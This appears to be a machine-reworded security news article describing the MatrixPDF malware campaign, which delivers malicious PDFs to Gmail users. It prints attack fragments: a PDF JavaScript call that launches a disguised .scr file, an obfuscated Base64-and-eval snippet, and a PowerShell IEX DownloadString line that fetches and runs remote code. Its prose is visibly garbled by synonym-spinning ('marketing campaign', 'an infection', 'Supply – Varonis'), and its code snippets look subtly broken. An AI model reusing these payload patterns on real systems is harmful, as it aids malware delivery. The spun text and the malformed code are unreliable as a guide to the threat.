In latest weeks, a novel malware marketing campaign dubbed MatrixPDF has surfaced, concentrating on Gmail customers with rigorously crafted emails that slip previous standard spam and phishing filters.
This marketing campaign has been energetic since mid-September 2025 and leverages PDF attachments that, when opened, provoke a stealthy an infection chain designed to exfiltrate delicate data and ship extra payloads.
Early indicators recommend that attackers are exploiting belief in PDF paperwork by embedding obfuscated scripts and leveraging reliable cloud internet hosting providers to host malicious payloads, making detection considerably more difficult.
The preliminary wave of assaults delivered emails masquerading as inside organizational communications, full with sensible headers and sender addresses spoofed to resemble trusted company domains.
Every e mail incorporates a PDF attachment named MatrixDoc.pdf, which seems innocent in preview. Nevertheless, the PDF is crafted with malformed objects and an embedded JavaScript motion that routinely executes when the doc is opened in suitable viewers.
Researchers famous that the JavaScript code employs custom-made obfuscation methods, together with string concatenation and nonstandard encoding schemes, to evade static evaluation.
Varonis analysts recognized the MatrixPDF marketing campaign after observing uncommon PDF parsing errors throughout a number of high-profile enterprise networks.
JavaScript actions in MatrixPDF, together with faux prompts & redirect buttons (Supply – Varonis)
Examination of the malicious paperwork revealed that the embedded script makes use of the util.printf() perform to dynamically reconstruct and execute a PowerShell command.
By chaining a number of decoding routines, the malware finally invokes:-
this.exportDataObject({cName: “payload.scr”, nLaunch: 2});
triggering the execution of a secondary executable disguised as a screensaver file. The PowerShell payload then reaches out to a cloud storage bucket to obtain extra modules, establishing command-and-control communications.
Additional evaluation uncovered that when the secondary payload is energetic, it registers a persistence mechanism by making a hidden scheduled job named MatrixUpdater.
This job runs each hour, making certain that the malware can replace itself or fetch new directions with out consumer intervention. Detection evasion is enhanced via intermittent community connections and randomized job names that change with every an infection.
An infection Mechanism
Delving into the an infection mechanism, MatrixPDF begins with PDF JavaScript exploiting the exportDataObject API to extract and launch the malicious .scr file.
Desktop PDF reader displaying a warning of an exterior connection (Supply – Varonis)
The embedded script reconstructs a Base64-encoded PowerShell command by piecing collectively a number of string fragments. A consultant snippet is proven under:-
var part1 = “ZXh0cmFjdC5GaWxl”;
var part2 = “LmQ=”;
var mixed = util.stringFromStream(util.createStream({
cData: part1 + part2
}));
eval(mixed);
This obfuscation method ensures that signature-based defenses battle to flag the script. As soon as decoded, the command executes:-
IEX (New-Object Web.WebClient).DownloadString(‘
which retrieves and runs a PowerShell script chargeable for deploying the principle payload. The script additionally leverages the Home windows Administration Instrumentation (WMI) service to verify for present infections, stopping duplicate installations.
Upon profitable obtain, the PowerShell script writes the payload to %APPDATApercentLocalMatrixmatrix.exe and configures a hidden scheduled job for persistence.
By way of its layered method, MatrixPDF demonstrates a complicated mix of social engineering, scripting abuse, and legit internet hosting infrastructure to compromise Gmail customers whereas sustaining a low forensic footprint.
Steady monitoring and heuristic-based PDF evaluation are important to detect and mitigate this rising risk.
Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most popular Supply in Google.
